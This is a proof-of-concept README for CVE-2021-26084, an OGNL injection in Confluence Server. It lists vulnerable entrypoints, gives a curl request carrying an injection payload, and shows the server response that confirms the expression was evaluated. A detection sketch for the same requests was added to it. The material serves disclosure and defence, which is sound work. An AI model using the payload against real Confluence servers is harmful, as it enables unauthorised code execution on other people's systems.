
cve-2021-26084_poc's Introduction

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.


My fight to locate the entrypoints and injections XD

[Screenshots: Fight (1) and Fight (2), Confluence "Oops, an error has occurred" pages]

Finally, Confluence entrypoints exploited:

https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

My first manual inspection (note: pre-authenticated user):

# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
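
A detection sketch for the request and response shown above, added here as an example and not part of the original PoC repository. It flags requests to the listed entrypoints whose body carries a unicode-escaped quote or an OGNL `#{` opener, and responses whose reflected `queryString` shows an evaluated expression; the function names, the suffix match on paths and the repeated URL-decoding are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Entrypoints from this page's list; suffix match tolerates a context path (assumption).
WATCHED_PATHS = (
    "/users/user-dark-features", "/login",
    "/pages/templates2/viewpagetemplate.action", "/template/custom/content-editor",
    "/templates/editor-preload-container", "/pages/createpage-entervariables.action",
)
ESCAPED_QUOTE = re.compile(r"\\u00(?:27|22)", re.I)  # literal \u0027 or \u0022
OGNL_OPENER = re.compile(r"#\{")                     # as in #{6*666}
EVALUATED = re.compile(r'name="queryString"\s+value="[^"]*\{\d+=null\}')

def normalise(body, rounds=3):
    """URL-decode until stable so single- and double-encoded input compare equal."""
    for _ in range(rounds):
        decoded = unquote(body)
        if decoded == body:
            break
        body = decoded
    return body

def inspect_request(path, body):
    """Return findings for one request to a watched path (empty list = clean)."""
    if not path.split("?", 1)[0].rstrip("/").endswith(WATCHED_PATHS):
        return []
    text = normalise(body)
    findings = []
    if ESCAPED_QUOTE.search(text):
        findings.append("unicode-escaped quote")
    if OGNL_OPENER.search(text):
        findings.append("OGNL #{ opener")
    return findings

def response_shows_evaluation(html):
    """True when the reflected queryString holds an evaluated map like {3996=null}."""
    return bool(EVALUATED.search(html))

# Constructed samples; the first request and the response mirror this page's.
SAMPLES = [
    ("/pages/createpage-entervariables.action", r"queryString=alt3kx\u0027%2b#{6*666}%2b\u0027"),
    ("/confluence/pages/createpage-entervariables.action", "queryString=alt3kx%255cu0027"),
    ("/pages/createpage-entervariables.action", "queryString=spaceKey%3DDOCS"),
]
RESPONSE = '<input type="hidden" name="queryString" value="alt3kx{3996=null}" />'
if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_request(path, body) or "clean")
    print("response evaluated:", response_shows_evaluation(RESPONSE))
```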

References:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Amazing writeup posted here:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Some very useful hints by:
@wvuuuuuuuuuuuuu
@iamnoooob

Author

Alex Hernandez aka (@_alt3kx_)
